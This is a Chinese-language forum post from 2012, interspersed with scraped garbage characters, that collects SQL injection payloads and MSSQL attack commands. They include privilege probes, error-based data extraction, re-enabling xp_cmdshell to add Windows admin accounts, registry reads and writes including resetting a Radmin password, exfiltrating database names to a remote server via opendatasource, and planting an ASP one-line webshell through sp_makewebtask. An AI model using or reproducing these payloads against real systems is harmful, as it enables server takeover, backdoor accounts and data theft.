阿D常用的一些注入命令
6 @8 V/ Z* w5 H: c//看看是什么权限的- @0 V6 J7 b9 v
and 1=(Select IS_MEMBER('db_owner'))
" T( D, k) L/ W: q2 \ gAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
I/ ^, Q8 O2 D g9 M4 w P3 n/ g# e( s2 v1 Q7 A& `! b9 ]
//检测是否有读取某数据库的权限
6 g# q; }6 V; l, O( Zand 1= (Select HAS_DBACCESS('master'))1 j/ {* O) y4 ]! }
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --# K' _1 K. R1 u: K A; G ^
: y4 M7 X% z7 m/ ]
& A% P2 }7 }5 t e
数字类型
1 J* R' @; d( L/ n; ~$ nand char(124)%2Buser%2Bchar(124)=0; i4 A2 i! E) @2 N% d
; q& ?$ t5 k4 o% G2 \字符类型$ K6 j% m+ J1 `& @/ U
' and char(124)%2Buser%2Bchar(124)=0 and ''='
& l+ ]" y& D2 u( _/ k1 y& t3 f0 d* H, Y: V3 N- i
搜索类型1 Y3 O/ A6 R+ A' j
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
0 T w ] o/ n2 ]8 f" J1 I3 q ~
1 U3 s8 a. a t" P" T爆用户名
+ |5 ~( G4 Y$ ]4 ^! Land user>0
9 L/ I( [) Q6 e9 J L6 g& Q) \3 V2 R8 F' and user>0 and ''='
& ^/ I# Y' S& i' F0 X( }8 x8 |, F5 I- g/ Z3 P' r5 F4 E5 f; y
检测是否为SA权限
* }1 y& K L% i( H# n/ h* cand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
* L8 @0 G5 \( t% p- TAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --$ e' ]1 n) E3 K4 W* e# r* V
2 H% X7 I" M" K, U* q检测是不是MSSQL数据库( a, I6 O2 ?* ]0 h
and exists (select * from sysobjects);--
6 E: z! C) i9 s
, f+ f# Q9 Y) d2 W9 J检测是否支持多行8 _9 ^: I5 c. ]9 `3 `8 a( f
;declare @d int;--
9 f/ n1 Z0 ]* c- p7 c4 T8 i8 \: c7 f8 I5 E9 H" N" f4 g
恢复 xp_cmdshell3 r; p: c$ \& F9 r
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--' I) v& \6 n. |- }8 W& N; U
5 K4 X9 i: e C& `1 G! Y3 }) l! P/ p, k m. [7 Z) }
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
: Y H9 S: F$ ~
+ ^( D# G, V# P5 B6 C//-----------------------
' m/ D; C, u O$ s: E// 执行命令5 z% x+ I4 U$ z$ v7 \# k6 m
//-----------------------
; ?4 k' x; a" U/ B6 g首先开启沙盘模式:2 X, L8 _: M/ i5 ?
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',17 G; F, y: J% |) |. B, }8 J
) G& x& h( s$ q" f. u3 s- L' Q
然后利用jet.oledb执行系统命令( F; ]8 Y. x8 K* a7 P
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
( W- {. y/ `- d/ I. `2 B+ W2 L. g/ s& g4 W; a
执行命令
1 [1 m! T/ w6 [7 k X( S;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
; A5 o# w" q0 B& D9 G# \! c% p
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
" {1 \4 J) q; g9 @+ j, U- R$ K4 F+ j9 c+ R3 Y5 [0 S9 P2 x8 s
判断xp_cmdshell扩展存储过程是否存在:# C/ r$ Q/ i3 H ]7 U* k }
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')0 u% `8 m# P4 G& L4 w
/ v! R0 t2 s# x写注册表
+ z6 Z0 i5 K0 X0 l, v9 vexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
* L; d0 a" }8 w2 T# n0 B3 x! b% }+ B
REG_SZ
- V& P$ W1 q! \0 m0 ?8 E: p% H/ i) S" o3 y- A: {& ?5 G x7 r, g
读注册表3 s5 K& P6 Z: |& z; g: D- r
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'" c$ c) P/ E8 v
% _5 O6 e) r; {2 u1 b O
读取目录内容4 {3 h4 @+ W4 W
exec master..xp_dirtree 'c:\winnt\system32\',1,1
& _5 o! c: V3 ?. _% ?
( L+ C) ]2 t( ]+ H1 ?! Y3 u% S7 ?; y2 {# V) O/ c2 l" r: m
数据库备份. ?& Y; r9 y# p0 g
backup database pubs to disk = 'c:\123.bak'6 _* Z5 m) K: ^( v0 z
& _2 ]" c* R% c! _# d" {//爆出长度
3 k4 Z5 q$ T2 V' lAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
% | Z; e. J1 ]$ t3 W' c5 ^/ a; T( W+ D% t' Q2 h/ o3 a% c* H
: V" V' d4 e) j) P6 O P5 H, X1 N# R7 _
# M0 t% { I; k) c- l: U更改sa口令方法:用sql综合利用工具连接后,执行命令:
$ Q% M- q0 g" Y# }2 l7 S8 Zexec sp_password NULL,'新密码','sa'3 _. ^9 p* y7 ?, Q& ^2 ~9 Y
; e+ P. m% ]$ M& v0 G" s添加和删除一个SA权限的用户test:
/ m0 X( K7 r7 ~7 }exec master.dbo.sp_addlogin test,ptlove
0 k% ^0 X Z1 Vexec master.dbo.sp_addsrvrolemember test,sysadmin
6 N9 T0 Q" U/ T- k$ S8 H$ B8 N# q) v6 a5 L' p4 q
删除扩展存储过过程xp_cmdshell的语句:
( c" K* z- r! a% o7 Texec sp_dropextendedproc 'xp_cmdshell'9 g' M: G/ V* {
$ } R8 Y& \) m4 m9 d$ g添加扩展存储过过程0 A% g' L1 c8 P) A2 F P {4 _
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ( B# c( p8 d% b3 V# t! `1 R, ]
GRANT exec On xp_proxiedadata TO public
/ g1 n8 Y$ X4 r) t8 B
/ `. H5 Q- t8 Y+ H* n* q! l
/ Y. ?0 |9 p8 w9 R* U, {& a* s停掉或激活某个服务。 . T& a$ V2 q l# @
6 T1 v/ R. v; a$ S# M
exec master..xp_servicecontrol 'stop','schedule'
; h \6 h; V9 p% rexec master..xp_servicecontrol 'start','schedule'
6 i6 Y( J2 U+ J3 E0 Z- B1 o* {) v! t+ G3 d# J" ?/ J. K
dbo.xp_subdirs. X2 y, s# i8 g9 z, a" X
! Z6 _& B/ {% p; B+ e7 \
只列某个目录下的子目录。
, p/ E8 a0 Q3 t; W$ ~9 W9 ^xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
/ l- ^1 {0 T) @
( y1 E a3 T/ _! W+ u8 Ddbo.xp_makecab/ g+ _1 r( C. s$ h: h
9 o1 a0 U9 R( j& ~1 m/ _
将目标多个档案压缩到某个目标档案之内。6 p8 O) J( o# M% t; E1 E. Z) q
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
( b) ^. ~# \" C% l4 I3 ^( `% [" n$ E7 N6 K- q) v$ z
dbo.xp_makecab
8 W& l% w+ L1 S6 [& r' F( u'c:\test.cab','mszip',1,* F9 t3 |0 v/ E7 |3 L0 B$ |0 S
'C:\Inetpub\wwwroot\SQLInject\login.asp',: @ c$ k k7 o$ O# ~
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'; d- f! m c' O1 e- n
0 d8 p% v; b4 z) d3 x8 @xp_terminate_process
$ `: O" ` ~( H4 |$ w1 N! Z9 Q$ [8 s" y0 r' y$ t+ l, W
停掉某个执行中的程序,但赋予的参数是 Process ID。
. x- e& C$ E6 k利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
( w& X$ \3 n: I$ Z
6 a; x/ C1 G, R3 T0 jxp_terminate_process 2484
' \7 c0 K- k. U" j# N2 t+ J; U/ }5 `) A5 W& }# p: P! B0 `; W
xp_unpackcab( p3 m* M3 V1 Z- J: B3 t2 {
4 w8 `& f* K6 N4 i" |
解开压缩档。7 L4 T( B8 S5 s/ K* {' U- ]9 t! b
) n o! \. v. w& Fxp_unpackcab 'c:\test.cab','c:\temp',1& b4 W" l' _) P9 `+ C0 z* a U
, [0 @6 _, F9 m) G
) Q* B( b9 {+ G
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234% e+ J' Y: a: S6 Q; U% z. L# R$ C' X3 k
r+ H( G! K! z8 v; T+ Y8 mcreate database lcx;, S$ M H, x6 G
Create TABLE ku(name nvarchar(256) null);
) i5 q3 {# _2 N& l0 u9 \" KCreate TABLE biao(id int NULL,name nvarchar(256) null);
& l$ I3 r2 q! r" ^9 G2 l# S2 `! D, o: A2 _' m Z& G
//得到数据库名% V. z* ?4 i' i
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
! `5 [; }6 G/ B+ n
& |" Q2 Z) b7 y' W3 j/ Y4 m* ] m
//在Master中创建表,看看权限怎样
0 n+ m3 r" e$ k# H8 ^( I) QCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--) G7 m d; c5 R% L- A
8 e1 H0 q" y, v
用 sp_makewebtask直接在web目录里写入一句话马:7 v: C+ ]# C& O' M+ T
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--: u% U) s1 F( y' d1 p( B
+ h1 ]; U \% S9 N% y% r; A" ~6 G' ~
//更新表内容
' U; j5 p' D8 P" a; g7 m- W3 EUpdate films SET kind = 'Dramatic' Where id = 123
' j, Y0 r9 U8 N2 w1 r' ?( \
3 Z6 m. F& B* f" p& H//删除内容: p, d/ A, h$ x. |/ t
delete from table_name where Stockid = 3 |
发表于 2012-9-13 17:26:30
收藏
支持
反对